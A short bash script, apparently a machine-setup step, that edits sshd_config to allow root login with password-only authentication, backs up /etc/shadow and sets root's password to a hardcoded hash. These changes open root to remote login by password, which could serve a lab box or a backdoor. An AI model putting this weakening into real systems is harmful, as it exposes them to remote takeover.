#!/usr/bin/env bash
set -Eeuo pipefail

#install -m 0755 generate_checkbox.sh /usr/local/sbin/generate_checkbox.sh
#systemctl enable generate-checkbox.service
sed -i 's/^#\?PermitRootLogin.*/PermitRootLogin yes/' /etc/ssh/sshd_config
sed -i 's/^#\?AuthenticationMethods.*/AuthenticationMethods password/' /etc/ssh/sshd_config
#systemctl reload sshd
cp -p /etc/shadow /etc/shadow.ORIG
usermod --password '$y$j9T$MOmOiVKPumidK.QeMv6Bj1$yTuto5iWpHdiGUOgrck53g9kGT0AlC1dMn0J3MtH8yD' root
